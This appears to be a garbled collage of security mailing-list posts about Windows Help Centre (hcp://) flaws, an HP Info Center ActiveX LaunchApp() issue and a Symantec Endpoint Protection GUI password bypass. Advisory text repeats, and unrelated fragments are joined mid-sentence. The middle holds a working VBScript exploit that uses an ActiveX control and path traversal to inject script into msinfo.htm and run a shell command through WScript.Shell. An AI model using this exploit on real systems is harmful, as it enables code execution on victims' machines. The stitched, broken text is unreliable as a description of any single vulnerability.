Tavis Ormandy wrote:
> Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
> ----------------------------------------------------------------------------
>
> Help and Support Centre is the default application provided to access online
> documentation for Microsoft Windows. Microsoft supports accessing help documents
> directly via URLs by installing a protocol handler for the scheme "hcp",
> a typical example is provided in the Windows XP Command Line Reference,
> available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
>
Subject: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
----------------------------------------------------------------------------
Help and Support Centre is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
----------------------------------------------------------------------------
Help and Support Centre is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe, as when invoked via the registered
an application build to support the user with quick wifi configuration, update check and so on.
The application window contains enbeded IE control to launch the HPINFO ActiveX CTL.
IE uses the JS script 'HPInfoCenter.js' located in the same dir, which is used to response
user input. When user selects the option he is intrested of, the JS code executes HPINFO
control's LaunchApp() method, which spawns the new process using JS code-specified path.
(e.g. Wireless Assistant, Help and Support Center, ...)
The first problem is that the path variable passed as an argument to the LaunchApp() method
doesn't distinguish between global disk area and local HP software area.
Therefore using this method, one is able to launch ANY executable binary within the system
within the logged user context.
Combining this method with the system command shell one can execute any shell command sequence
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe trough the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>
original url: http://retrogod.altervista.org/9sg_supportsoft_ce_l_hai_nel_dna.html
denied access to.
When the batch file is running, Open the file "c:\Program
Files\Symantec\Symantec Endpoint Protection\symcorpui.exe"
Even if the password has been set or the administrator has disabled the user
to open the GUI, All the conditions will be bypassed.
And as I said before, The Help and Support > Troubleshooting will show the
server as offline for the client and the NTP will not be visible if its
installed.
Thank you.
> denied access to.
> When the batch file is running, Open the file "c:\Program
> Files\Symantec\Symantec Endpoint Protection\symcorpui.exe"
> Even if the password has been set or the administrator has disabled the
> user to open the GUI, All the conditions will be bypassed.
> And as I said before, The Help and Support > Troubleshooting will show the
> server as offline for the client and the NTP will not be visible if its
> installed.
>
> Thank you.
>
